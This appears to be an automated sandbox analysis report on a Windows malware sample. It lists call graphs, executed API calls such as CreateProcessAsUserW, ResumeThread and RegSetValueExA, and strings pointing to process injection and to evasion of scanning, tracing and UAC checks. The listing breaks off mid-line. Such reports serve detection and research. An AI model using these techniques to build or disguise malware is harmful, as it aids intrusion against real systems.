38774->38777 38776 28847ec 11 API calls 38775->38776 38780 28aa3a7 38776->38780 38778 28989d0 20 API calls 38777->38778 38779 28a8e30 38778->38779 38781 2884860 11 API calls 38779->38781 38782 28989d0 20 API calls 38780->38782 38785 28a8e51 38781->38785 38783 28aa3cb 38782->38783 38784 2884860 11 API calls 38783->38784 38787 28aa3ec 38784->38787 38786 28847ec 11 API calls 38785->38786 38789 28a8e88 38786->38789 38788 28847ec 11 API calls 38787->38788 38793 28aa423 38788->38793 38790 28989d0 20 API calls 38789->38790 38791 28a8eac CloseHandle 38790->38791 38792 2884860 11 API calls 38791->38792 38795 28a8ed8 38792->38795 38794 28989d0 20 API calls 38793->38794 38796 28aa447 38794->38796 38797 28847ec 11 API calls 38795->38797 38798 28989d0 20 API calls 38796->38798 38799 28a8f0f 38797->38799 38800 28aa47a 38798->38800 38801 28989d0 20 API calls 38799->38801 38803 28989d0 20 API calls 38800->38803 38802 28a8f33 38801->38802 38804 2884860 11 API calls 38802->38804 38805 28aa4ad 38803->38805 38806 28a8f54 38804->38806 38807 28989d0 20 API calls 38805->38807 38808 28847ec 11 API calls 38806->38808 38809 28aa4e0 38807->38809 38810 28a8f8b 38808->38810 38811 28989d0 20 API calls 38809->38811 38812 28989d0 20 API calls 38810->38812 38813 28aa513 38811->38813 38814 28a8faf 38812->38814 38815 2884860 11 API calls 38813->38815 38816 2884860 11 API calls 38814->38816 38818 28aa534 38815->38818 38817 28a8fd0 38816->38817 38820 28847ec 11 API calls 38817->38820 38819 28847ec 11 API calls 38818->38819 38821 28aa56b 38819->38821 38822 28a9007 38820->38822 38823 28989d0 20 API calls 38821->38823 38824 28989d0 20 API calls 38822->38824 38825 28aa58f 38823->38825 38826 28a902b 38824->38826 38827 2884860 11 API calls 38825->38827 38828 2884860 11 API calls 38826->38828 38829 28aa5b0 38827->38829 38830 28a904c 38828->38830 38832 28847ec 11 API calls 38829->38832 38831 28847ec 11 API calls 38830->38831 38834 28a9083 38831->38834 38833 28aa5e7 38832->38833 38835 28989d0 20 API calls 38833->38835 38836 28989d0 20 API calls 38834->38836 38839 28aa60b 38835->38839 38837 28a90a7 38836->38837 38838 2884860 11 API calls 38837->38838 38841 28a90c8 38838->38841 38840 28989d0 20 API calls 38839->38840 38843 28aa63e 38840->38843 38842 28847ec 11 API calls 38841->38842 38845 28a90ff 38842->38845 38844 28989d0 20 API calls 38843->38844 38848 28aa671 38844->38848 38846 28989d0 20 API calls 38845->38846 38847 28a9123 38846->38847 38849 2884860 11 API calls 38847->38849 38850 28989d0 20 API calls 38848->38850 38851 28a9144 38849->38851 38852 28aa6a4 38850->38852 38853 28847ec 11 API calls 38851->38853 38854 28989d0 20 API calls 38852->38854 38855 28a917b 38853->38855 38856 28aa6d7 38854->38856 38857 28989d0 20 API calls 38855->38857 38859 28989d0 20 API calls 38856->38859 38858 28a919f 38857->38858 38860 2884860 11 API calls 38858->38860 38861 28aa70a 38859->38861 38863 28a91c0 38860->38863 38862 2884860 11 API calls 38861->38862 38864 28aa72b 38862->38864 38865 28847ec 11 API calls 38863->38865 38866 28847ec 11 API calls 38864->38866 38867 28a91f7 38865->38867 38869 28aa762 38866->38869 38868 28989d0 20 API calls 38867->38868 38870 28a921b 38868->38870 38871 28989d0 20 API calls 38869->38871 38874 289894c 21 API calls 38870->38874 38872 28aa786 38871->38872 38873 2884860 11 API calls 38872->38873 38878 28aa7a7 38873->38878 38875 28a923a 38874->38875 38876 289894c 21 API calls 38875->38876 38877 28a924e 38876->38877 38879 289894c 21 API calls 38877->38879 38881 28847ec 11 API calls 38878->38881 38880 28a9262 38879->38880 38882 289894c 21 API calls 38880->38882 38886 28aa7de 38881->38886 38883 28a9276 38882->38883 38884 289894c 21 API calls 38883->38884 38885 28a928a 38884->38885 38887 289894c 21 API calls 38885->38887 38890 28989d0 20 API calls 38886->38890 38888 28a929e CloseHandle 38887->38888 38889 2884860 11 API calls 38888->38889 38893 28a92ca 38889->38893 38891 28aa802 38890->38891 38892 2884860 11 API calls 38891->38892 38894 28aa823 38892->38894 38895 28847ec 11 API calls 38893->38895 38896 28847ec 11 API calls 38894->38896 38897 28a9301 38895->38897 38898 28aa85a 38896->38898 38899 28989d0 20 API calls 38897->38899 38901 28989d0 20 API calls 38898->38901 38900 28a9325 38899->38900 38902 2884860 11 API calls 38900->38902 38903 28aa87e 38901->38903 38905 28a9346 38902->38905 38904 2884860 11 API calls 38903->38904 38906 28aa89f 38904->38906 38907 28847ec 11 API calls 38905->38907 38908 28847ec 11 API calls 38906->38908 38909 28a937d 38907->38909 38910 28aa8d6 38908->38910 38911 28989d0 20 API calls 38909->38911 38912 28989d0 20 API calls 38910->38912 38911->38368 38913 28aa8fa 38912->38913 38914 2884860 11 API calls 38913->38914 38915 28aa91b 38914->38915 38916 28847ec 11 API calls 38915->38916 38917 28aa952 38916->38917 38918 28989d0 20 API calls 38917->38918 38919 28aa976 38918->38919 38920 28989d0 20 API calls 38919->38920 38921 28aa985 38920->38921 38922 28989d0 20 API calls 38921->38922 38923 28aa994 38922->38923 38924 28989d0 20 API calls 38923->38924 38925 28aa9a3 38924->38925 38926 28989d0 20 API calls 38925->38926 38927 28aa9b2 38926->38927 38928 28989d0 20 API calls 38927->38928 38929 28aa9c1 38928->38929 38930 28989d0 20 API calls 38929->38930 38931 28aa9d0 38930->38931 38932 28989d0 20 API calls 38931->38932 38933 28aa9df 38932->38933 38934 28989d0 20 API calls 38933->38934 38935 28aa9ee 38934->38935 38936 28989d0 20 API calls 38935->38936 38937 28aa9fd 38936->38937 38938 28989d0 20 API calls 38937->38938 38939 28aaa0c 38938->38939 38940 28989d0 20 API calls 38939->38940 38941 28aaa1b 38940->38941 38942 28989d0 20 API calls 38941->38942 38943 28aaa2a 38942->38943 38944 28989d0 20 API calls 38943->38944 38945 28aaa39 38944->38945 38946 28989d0 20 API calls 38945->38946 38947 28aaa48 38946->38947 38948 28989d0 20 API calls 38947->38948 38949 28aaa57 38948->38949 38950 2884860 11 API calls 38949->38950 38951 28aaa78 38950->38951 38952 28847ec 11 API calls 38951->38952 38953 28aaaaf 38952->38953 38954 28989d0 20 API calls 38953->38954 38955 28aaad3 38954->38955 38956 28989d0 20 API calls 38955->38956 38957 28aab06 38956->38957 38958 28989d0 20 API calls 38957->38958 38959 28aab39 38958->38959 38960 28989d0 20 API calls 38959->38960 38961 28aab6c 38960->38961 38962 28989d0 20 API calls 38961->38962 38963 28aab9f 38962->38963 38964 28989d0 20 API calls 38963->38964 38965 28aabd2 38964->38965 38966 28989d0 20 API calls 38965->38966 38967 28aac05 38966->38967 38968 28989d0 20 API calls 38967->38968 38969 28aac38 38968->38969 38970 2884860 11 API calls 38969->38970 38971 28aac59 38970->38971 38972 28847ec 11 API calls 38971->38972 38973 28aac90 38972->38973 38974 28989d0 20 API calls 38973->38974 38975 28aacb4 38974->38975 38976 2884860 11 API calls 38975->38976 38977 28aacd5 38976->38977 38978 28847ec 11 API calls 38977->38978 38979 28aad0c 38978->38979 38980 28989d0 20 API calls 38979->38980 38981 28aad30 38980->38981 38982 2884860 11 API calls 38981->38982 38983 28aad51 38982->38983 38984 28847ec 11 API calls 38983->38984 38985 28aad88 38984->38985 38986 28989d0 20 API calls 38985->38986 38987 28aadac 38986->38987 38988 28989d0 20 API calls 38987->38988 38989 28aaddf 38988->38989 38990 28989d0 20 API calls 38989->38990 38991 28aae12 38990->38991 38992 28989d0 20 API calls 38991->38992 38993 28aae45 38992->38993 38994 28989d0 20 API calls 38993->38994 38995 28aae78 38994->38995 38996 28989d0 20 API calls 38995->38996 38997 28aaeab 38996->38997 38998 28989d0 20 API calls 38997->38998 38999 28aaede 38998->38999 39000 28989d0 20 API calls 38999->39000 39001 28aaf11 39000->39001 39002 28989d0 20 API calls 39001->39002 39003 28aaf44 39002->39003 39004 28989d0 20 API calls 39003->39004 39005 28aaf77 39004->39005 39006 28989d0 20 API calls 39005->39006 39007 28aafaa 39006->39007 39008 28989d0 20 API calls 39007->39008 39009 28aafdd 39008->39009 39010 28989d0 20 API calls 39009->39010 39011 28ab010 39010->39011 39012 28989d0 20 API calls 39011->39012 39013 28ab043 39012->39013 39014 28989d0 20 API calls 39013->39014 39015 28ab076 39014->39015 39016 28989d0 20 API calls 39015->39016 39017 28ab0a9 39016->39017 39018 28989d0 20 API calls 39017->39018 39019 28ab0dc 39018->39019 39020 28989d0 20 API calls 39019->39020 39021 28ab10f 39020->39021 39022 28989d0 20 API calls 39021->39022 39023 28ab142 39022->39023 39024 28989d0 20 API calls 39023->39024 39025 28ab175 39024->39025 39026 2898338 18 API calls 39025->39026 39027 28ab184 39026->39027 39028 2884860 11 API calls 39027->39028 39029 28ab1a5 39028->39029 39030 28847ec 11 API calls 39029->39030 39031 28ab1dc 39030->39031 39032 28989d0 20 API calls 39031->39032 39033 28ab200 39032->39033 39034 2884860 11 API calls 39033->39034 39035 28ab221 39034->39035 39036 28847ec 11 API calls 39035->39036 39037 28ab258 39036->39037 39038 28989d0 20 API calls 39037->39038 39039 28ab27c 39038->39039 39040 2884860 11 API calls 39039->39040 39041 28ab29d 39040->39041 39042 28847ec 11 API calls 39041->39042 39043 28ab2d4 39042->39043 39044 28989d0 20 API calls 39043->39044 39045 28ab2f8 ExitProcess 39044->39045 39047 289f22b 39046->39047 39048 289f256 RegOpenKeyA 39047->39048 39049 289f264 39048->39049 39050 28849f8 11 API calls 39049->39050 39051 289f27c 39050->39051 39052 289f289 RegSetValueExA RegCloseKey 39051->39052 39053 289f2ad 39052->39053 39054 2884500 11 API calls 39053->39054 39055 289f2ba 39054->39055 39056 28844dc 11 API calls 39055->39056 39057 289f2c2 39056->39057 39057->38262 39058->38582 39059->38676 39060->38430

                                                                            Executed Functions

                                                                            Function 028A8128 Relevance: 162.0, APIs: 5, Strings: 86, Instructions: 2778processthreadCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 4574 28a8128-28a8517 call 2884860 call 28849a0 call 28846d4 call 28847ec call 28849a0 call 28846d4 call 28989d0 call 2884860 call 28849a0 call 28846d4 call 28847ec call 28849a0 call 28846d4 call 28989d0 call 2884860 call 28849a0 call 28846d4 call 28847ec call 28849a0 call 28846d4 call 28989d0 call 2884860 call 28849a0 call 28846d4 call 28847ec call 28849a0 call 28846d4 call 28989d0 call 2884860 call 28849a0 call 28846d4 call 28847ec call 28849a0 call 28846d4 call 28989d0 call 2884860 call 28849a0 call 28846d4 call 28847ec call 28849a0 call 28846d4 call 28989d0 call 2884860 call 28849a0 call 28846d4 call 28847ec call 28849a0 call 28846d4 call 28989d0 call 2884860 call 28849a0 call 28846d4 call 28847ec call 28849a0 call 28846d4 call 28989d0 call 28848ec 4689 28a851d-28a86f0 call 2884860 call 28849a0 call 28846d4 call 28847ec call 28849a0 call 28846d4 call 28989d0 call 2884860 call 28849a0 call 28846d4 call 28847ec call 28849a0 call 28846d4 call 28989d0 call 2884860 call 28849a0 call 28846d4 call 28847ec call 28849a0 call 28846d4 call 28989d0 call 28847ec call 28849a0 call 2884d74 call 2884df0 CreateProcessAsUserW 4574->4689 4690 28a93a1-28a9524 call 2884860 call 28849a0 call 28846d4 call 28847ec call 28849a0 call 28846d4 call 28989d0 call 2884860 call 28849a0 call 28846d4 call 28847ec call 28849a0 call 28846d4 call 28989d0 call 2884860 call 28849a0 call 28846d4 call 28847ec call 28849a0 call 28846d4 call 28989d0 call 28848ec 4574->4690 4798 28a876e-28a8879 call 2884860 call 28849a0 call 28846d4 call 28847ec call 28849a0 call 28846d4 call 28989d0 call 2884860 call 28849a0 call 28846d4 call 28847ec call 28849a0 call 28846d4 call 28989d0 4689->4798 4799 28a86f2-28a8769 call 2884860 call 28849a0 call 28846d4 call 28847ec call 28849a0 call 28846d4 call 28989d0 4689->4799 4779 28a952a-28a9539 call 28848ec 4690->4779 4780 28a9cf5-28ab2fa call 2884860 call 28849a0 call 28846d4 call 28847ec call 28849a0 call 28846d4 call 28989d0 call 2884860 call 28849a0 call 28846d4 call 28847ec call 28849a0 call 28846d4 call 28989d0 call 2884860 call 28849a0 call 28846d4 call 28847ec call 28849a0 call 28846d4 call 28989d0 call 28846d4 * 2 call 28989d0 call 28846d4 * 2 call 28989d0 call 28846d4 * 2 call 28989d0 call 28846d4 * 2 call 28989d0 call 2884860 call 28849a0 call 28846d4 call 28847ec call 28849a0 call 28846d4 call 28989d0 call 2884860 call 28849a0 call 28846d4 call 28847ec call 28849a0 call 28846d4 call 28989d0 call 2884860 call 28849a0 call 28846d4 call 28847ec call 28849a0 call 28846d4 call 28989d0 call 28846d4 * 2 call 28989d0 call 28846d4 * 2 call 28989d0 call 28846d4 * 2 call 28989d0 call 28846d4 * 2 call 28989d0 call 28846d4 * 2 call 28989d0 call 2884860 call 28849a0 call 28846d4 call 28847ec call 28849a0 call 28846d4 call 28989d0 call 2884860 call 28849a0 call 28846d4 call 28847ec call 28849a0 call 28846d4 call 28989d0 call 28846d4 * 2 call 28989d0 call 2884860 call 28849a0 call 28846d4 call 28847ec call 28849a0 call 28846d4 call 28989d0 call 2884860 call 28849a0 call 28846d4 call 28847ec call 28849a0 call 28846d4 call 28989d0 call 2884860 call 28849a0 call 28846d4 call 28847ec call 28849a0 call 28846d4 call 28989d0 call 28846d4 * 2 call 28989d0 call 28846d4 * 2 call 28989d0 call 28846d4 * 2 call 28989d0 call 28846d4 * 2 call 28989d0 call 2884860 call 28849a0 call 28846d4 call 28847ec call 28849a0 call 28846d4 call 28989d0 call 2884860 call 28849a0 call 28846d4 call 28847ec call 28849a0 call 28846d4 call 28989d0 call 28846d4 * 2 call 28989d0 call 28846d4 * 2 call 28989d0 call 28846d4 * 2 call 28989d0 call 28846d4 * 2 call 28989d0 call 28846d4 * 2 call 28989d0 call 2884860 call 28849a0 call 28846d4 call 28847ec call 28849a0 call 28846d4 call 28989d0 call 2884860 call 28849a0 call 28846d4 call 28847ec call 28849a0 call 28846d4 call 28989d0 call 2884860 call 28849a0 call 28846d4 call 28847ec call 28849a0 call 28846d4 call 28989d0 call 2884860 call 28849a0 call 28846d4 call 28847ec call 28849a0 call 28846d4 call 28989d0 call 2884860 call 28849a0 call 28846d4 call 28847ec call 28849a0 call 28846d4 call 28989d0 * 16 call 2884860 call 28849a0 call 28846d4 call 28847ec call 28849a0 call 28846d4 call 28989d0 call 28846d4 * 2 call 28989d0 call 28846d4 * 2 call 28989d0 call 28846d4 * 2 call 28989d0 call 28846d4 * 2 call 28989d0 call 28846d4 * 2 call 28989d0 call 28846d4 * 2 call 28989d0 call 28846d4 * 2 call 28989d0 call 2884860 call 28849a0 call 28846d4 call 28847ec call 28849a0 call 28846d4 call 28989d0 call 2884860 call 28849a0 call 28846d4 call 28847ec call 28849a0 call 28846d4 call 28989d0 call 2884860 call 28849a0 call 28846d4 call 28847ec call 28849a0 call 28846d4 call 28989d0 call 28846d4 * 2 call 28989d0 call 28846d4 * 2 call 28989d0 call 28846d4 * 2 call 28989d0 call 28846d4 * 2 call 28989d0 call 28846d4 * 2 call 28989d0 call 28846d4 * 2 call 28989d0 call 28846d4 * 2 call 28989d0 call 28846d4 * 2 call 28989d0 call 28846d4 * 2 call 28989d0 call 28846d4 * 2 call 28989d0 call 28846d4 * 2 call 28989d0 call 28846d4 * 2 call 28989d0 call 28846d4 * 2 call 28989d0 call 28846d4 * 2 call 28989d0 call 28846d4 * 2 call 28989d0 call 28846d4 * 2 call 28989d0 call 28846d4 * 2 call 28989d0 call 28846d4 * 2 call 28989d0 call 28846d4 * 2 call 28989d0 call 2897c10 call 2898338 call 2884860 call 28849a0 call 28846d4 call 28847ec call 28849a0 call 28846d4 call 28989d0 call 2884860 call 28849a0 call 28846d4 call 28847ec call 28849a0 call 28846d4 call 28989d0 call 2884860 call 28849a0 call 28846d4 call 28847ec call 28849a0 call 28846d4 call 28989d0 ExitProcess 4690->4780 4779->4780 4789 28a953f-28a9812 call 2884860 call 28849a0 call 28846d4 call 28847ec call 28849a0 call 28846d4 call 28989d0 call 2884860 call 28849a0 call 28846d4 call 28847ec call 28849a0 call 28846d4 call 28989d0 call 2884860 call 28849a0 call 28846d4 call 28847ec call 28849a0 call 28846d4 call 28989d0 call 289f094 call 2884860 call 28849a0 call 28846d4 call 2884860 call 28849a0 call 28846d4 call 28847ec call 28849a0 call 28846d4 call 28989d0 call 2884860 call 28849a0 call 28846d4 call 28847ec call 28849a0 call 28846d4 call 28989d0 call 2887e5c 4779->4789 5047 28a9818-28a9aea call 2884860 call 28849a0 call 28846d4 call 28847ec call 28849a0 call 28846d4 call 28989d0 call 2884860 call 28849a0 call 28846d4 call 28847ec call 28849a0 call 28846d4 call 28989d0 call 2884860 call 28849a0 call 28846d4 call 28847ec call 28849a0 call 28846d4 call 28989d0 call 289e358 call 2884530 call 2884860 call 28849a0 call 28846d4 call 28847ec call 28849a0 call 28846d4 call 28989d0 call 2884860 call 28849a0 call 28846d4 call 28847ec call 28849a0 call 28846d4 call 28989d0 call 2884de0 * 2 call 2884764 call 289dc8c 4789->5047 5048 28a9aef-28a9cf0 call 2884860 call 28849a0 call 28846d4 call 28847ec call 28849a0 call 28846d4 call 28989d0 call 2884860 call 28849a0 call 28846d4 call 28847ec call 28849a0 call 28846d4 call 28989d0 call 2884860 call 28849a0 call 28846d4 call 28847ec call 28849a0 call 28846d4 call 28989d0 call 2884860 call 28849a0 call 28846d4 call 28847ec call 28849a0 call 28846d4 call 28989d0 call 28849f8 call 2898d70 4789->5048 4900 28a887b-28a887e 4798->4900 4901 28a8880-28a8ba0 call 28849f8 call 289de50 call 2884860 call 28849a0 call 28846d4 call 28847ec call 28849a0 call 28846d4 call 28989d0 call 2884860 call 28849a0 call 28846d4 call 28847ec call 28849a0 call 28846d4 call 28989d0 call 2884860 call 28849a0 call 28846d4 call 28847ec call 28849a0 call 28846d4 call 28989d0 call 289d164 call 2884860 call 28849a0 call 28846d4 call 28847ec call 28849a0 call 28846d4 call 28989d0 call 2884860 call 28849a0 call 28846d4 call 28847ec call 28849a0 call 28846d4 call 28989d0 call 2884860 call 28849a0 call 28846d4 call 28847ec call 28849a0 call 28846d4 call 28989d0 4798->4901 4799->4798 4900->4901 5217 28a8bb9-28a939c call 2884860 call 28849a0 call 28846d4 call 28847ec call 28849a0 call 28846d4 call 28989d0 call 2884860 call 28849a0 call 28846d4 call 28847ec call 28849a0 call 28846d4 call 28989d0 call 2884860 call 28849a0 call 28846d4 call 28847ec call 28849a0 call 28846d4 call 28989d0 ResumeThread call 2884860 call 28849a0 call 28846d4 call 28847ec call 28849a0 call 28846d4 call 28989d0 call 2884860 call 28849a0 call 28846d4 call 28847ec call 28849a0 call 28846d4 call 28989d0 call 2884860 call 28849a0 call 28846d4 call 28847ec call 28849a0 call 28846d4 call 28989d0 CloseHandle call 2884860 call 28849a0 call 28846d4 call 28847ec call 28849a0 call 28846d4 call 28989d0 call 2884860 call 28849a0 call 28846d4 call 28847ec call 28849a0 call 28846d4 call 28989d0 call 2884860 call 28849a0 call 28846d4 call 28847ec call 28849a0 call 28846d4 call 28989d0 call 2884860 call 28849a0 call 28846d4 call 28847ec call 28849a0 call 28846d4 call 28989d0 call 2884860 call 28849a0 call 28846d4 call 28847ec call 28849a0 call 28846d4 call 28989d0 call 2884860 call 28849a0 call 28846d4 call 28847ec call 28849a0 call 28846d4 call 28989d0 call 2884860 call 28849a0 call 28846d4 call 28847ec call 28849a0 call 28846d4 call 28989d0 call 2898080 call 289894c * 6 CloseHandle call 2884860 call 28849a0 call 28846d4 call 28847ec call 28849a0 call 28846d4 call 28989d0 call 2884860 call 28849a0 call 28846d4 call 28847ec call 28849a0 call 28846d4 call 28989d0 4901->5217 5218 28a8ba2-28a8bb4 call 2898730 4901->5218 5047->5048 5048->4780 5217->4690 5218->5217
                                                                            APIs
                                                                              • Part of subcall function 028989D0: FreeLibrary.KERNEL32(74AE0000,00000000,00000000,00000000,00000000,0290738C,Function_0000662C,00000004,0290739C,0290738C,05F5E103,00000040,029073A0,74AE0000,00000000,00000000), ref: 02898AAA
                                                                            • CreateProcessAsUserW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,029FB7E0,029FB824,OpenSession,02907380,028AB7B8,UacScan,02907380), ref: 028A86E9
                                                                            • ResumeThread.KERNEL32(00000000,ScanBuffer,02907380,028AB7B8,OpenSession,02907380,028AB7B8,UacScan,02907380,028AB7B8,ScanBuffer,02907380,028AB7B8,OpenSession,02907380,028AB7B8), ref: 028A8D33
                                                                            • CloseHandle.KERNEL32(00000000,ScanBuffer,02907380,028AB7B8,OpenSession,02907380,028AB7B8,UacScan,02907380,028AB7B8,00000000,ScanBuffer,02907380,028AB7B8,OpenSession,02907380), ref: 028A8EB2
                                                                              • Part of subcall function 0289894C: LoadLibraryW.KERNEL32(bcrypt,?,00000000,00000000,029073A8,0289A587,ScanString,029073A8,0289A93C,ScanBuffer,029073A8,0289A93C,Initialize,029073A8,0289A93C,UacScan), ref: 02898960
                                                                              • Part of subcall function 0289894C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 0289897A
                                                                              • Part of subcall function 0289894C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000000,00000000,029073A8,0289A587,ScanString,029073A8,0289A93C,ScanBuffer,029073A8,0289A93C,Initialize), ref: 028989B6
                                                                            • CloseHandle.KERNEL32(00000000,00000000,ScanBuffer,02907380,028AB7B8,UacInitialize,02907380,028AB7B8,ScanBuffer,02907380,028AB7B8,OpenSession,02907380,028AB7B8,UacScan,02907380), ref: 028A92A4
                                                                              • Part of subcall function 02887E5C: GetFileAttributesA.KERNEL32(00000000,?,028A041F,ScanString,02907380,028AB7B8,OpenSession,02907380,028AB7B8,ScanString,02907380,028AB7B8,UacScan,02907380,028AB7B8,UacInitialize), ref: 02887E67
                                                                              • Part of subcall function 0289DC8C: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0289DD5E), ref: 0289DCCB
                                                                              • Part of subcall function 0289DC8C: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0289DD05
                                                                              • Part of subcall function 0289DC8C: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 0289DD32
                                                                              • Part of subcall function 0289DC8C: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 0289DD3B
                                                                              • Part of subcall function 02898338: FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,028983C2), ref: 028983A4
                                                                            • ExitProcess.KERNEL32(00000000,OpenSession,02907380,028AB7B8,ScanBuffer,02907380,028AB7B8,Initialize,02907380,028AB7B8,00000000,00000000,00000000,ScanString,02907380,028AB7B8), ref: 028AB2FA
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1782884776.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                            • Associated: 00000000.00000002.1782861328.0000000002880000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.0000000002907000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2880000_AWkpqJMxci.jbxd
                                                                            Similarity
                                                                            • API ID: CloseFileLibrary$CreateFreeHandlePathProcess$AddressAttributesCacheExitFlushInstructionLoadNameName_ProcResumeThreadUserWrite
                                                                            • String ID: Advapi$BCryptVerifySignature$C:\Windows\System32\$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPVerifyIndirectData$DllGetClassObject$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FlushInstructionCache$GetProcessMemoryInfo$I_QueryTagInformation$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MZP$MiniDumpReadDumpStream$MiniDumpWriteDump$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$UacInitialize$UacScan$VirtualAlloc$VirtualAllocEx$VirtualProtect$WriteVirtualMemory$advapi32$bcrypt$dbgcore$endpointdlp$kernel32$mssip32$ntdll$psapi$psapi$spp$sppc$sppwmi$tquery
                                                                            • API String ID: 2769005614-3738268246
                                                                            • Opcode ID: 128ca4829d051e00396aacecfc0864cd59e113f4e46ab96e851f0cc4b49e0a3e
                                                                            • Instruction ID: 6a1d1a9cb59d69e066d2b717bc98381c8c2bb80a9e217b39f72c5dc387b63da7
                                                                            • Opcode Fuzzy Hash: 128ca4829d051e00396aacecfc0864cd59e113f4e46ab96e851f0cc4b49e0a3e
                                                                            • Instruction Fuzzy Hash: 26431C3EA0811E8FEB50FB68DC909DE73BAEF99700F1440E1A009DB615DA71AE55CF46
                                                                            Function 0289B118 Relevance: 50.8, APIs: 6, Strings: 22, Instructions: 1829nativethreadCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 6027 289b118-289b11b 6028 289b120-289b125 6027->6028 6028->6028 6029 289b127-289b7b0 call 2884860 call 28849a0 call 28846d4 call 28847ec call 28849a0 call 28846d4 call 28989d0 call 2884860 call 28849a0 call 28846d4 call 28847ec call 28849a0 call 28846d4 call 28989d0 call 2884860 call 28849a0 call 28846d4 call 28847ec call 28849a0 call 28846d4 call 28989d0 call 2884860 call 28849a0 call 28846d4 call 28847ec call 28849a0 call 28846d4 call 28989d0 call 2884860 call 28849a0 call 28846d4 call 28847ec call 28849a0 call 28846d4 call 28989d0 call 2898594 call 2884860 call 28849a0 call 28846d4 call 28847ec call 28849a0 call 28846d4 call 28989d0 call 2884860 call 28849a0 call 28846d4 call 28847ec call 28849a0 call 28846d4 call 28989d0 GetModuleHandleW call 2898274 call 2884860 call 28849a0 call 28846d4 call 28847ec call 28849a0 call 28846d4 call 28989d0 call 2884860 call 28849a0 call 28846d4 call 28847ec call 28849a0 call 28846d4 call 28989d0 NtOpenProcess call 2884860 call 28849a0 call 28846d4 call 28847ec call 28849a0 call 28846d4 call 28989d0 call 2884860 call 28849a0 call 28846d4 call 28847ec call 28849a0 call 28846d4 call 28989d0 call 2884860 call 28849a0 call 28846d4 call 28847ec call 28849a0 call 28846d4 call 28989d0 call 2882ee0 call 2882f08 call 2884860 call 28849a0 call 28846d4 call 28847ec call 28849a0 call 28846d4 call 28989d0 call 2884860 call 28849a0 call 28846d4 call 28847ec call 28849a0 call 28846d4 call 28989d0 call 2884860 call 28849a0 call 28846d4 call 28847ec call 28849a0 call 28846d4 call 28989d0 6028->6029 6248 289cd28-289cf5e call 2884860 call 28849a0 call 28846d4 call 28847ec call 28849a0 call 28846d4 call 28989d0 call 289894c * 3 call 2884860 call 28849a0 call 28846d4 call 28847ec call 28849a0 call 28846d4 call 28989d0 call 2884860 call 28849a0 call 28846d4 call 28847ec call 28849a0 call 28846d4 call 28989d0 call 289894c * 4 call 2884860 call 28849a0 call 28846d4 call 28847ec call 28849a0 call 28846d4 call 28989d0 6029->6248 6249 289b7b6-289b930 call 2897c10 call 2897a2c call 2884860 call 28849a0 call 28846d4 call 28847ec call 28849a0 call 28846d4 call 28989d0 call 2884860 call 28849a0 call 28846d4 call 28847ec call 28849a0 call 28846d4 call 28989d0 call 2884860 call 28849a0 call 28846d4 call 28847ec call 28849a0 call 28846d4 call 28989d0 6029->6249 6386 289cf63-289cfa0 call 2884500 * 3 6248->6386 6249->6248 6345 289b936-289b966 call 28958f4 IsBadReadPtr 6249->6345 6345->6248 6358 289b96c-289b971 6345->6358 6358->6248 6360 289b977-289b993 IsBadReadPtr 6358->6360 6360->6248 6362 289b999-289b9a2 6360->6362 6362->6248 6363 289b9a8-289b9cd 6362->6363 6363->6248 6365 289b9d3-289bb4c call 2897c10 call 2897a2c call 2884860 call 28849a0 call 28846d4 call 28847ec call 28849a0 call 28846d4 call 28989d0 call 2884860 call 28849a0 call 28846d4 call 28847ec call 28849a0 call 28846d4 call 28989d0 call 2884860 call 28849a0 call 28846d4 call 28847ec call 28849a0 call 28846d4 call 28989d0 6363->6365 6365->6248 6430 289bb52-289bcc8 call 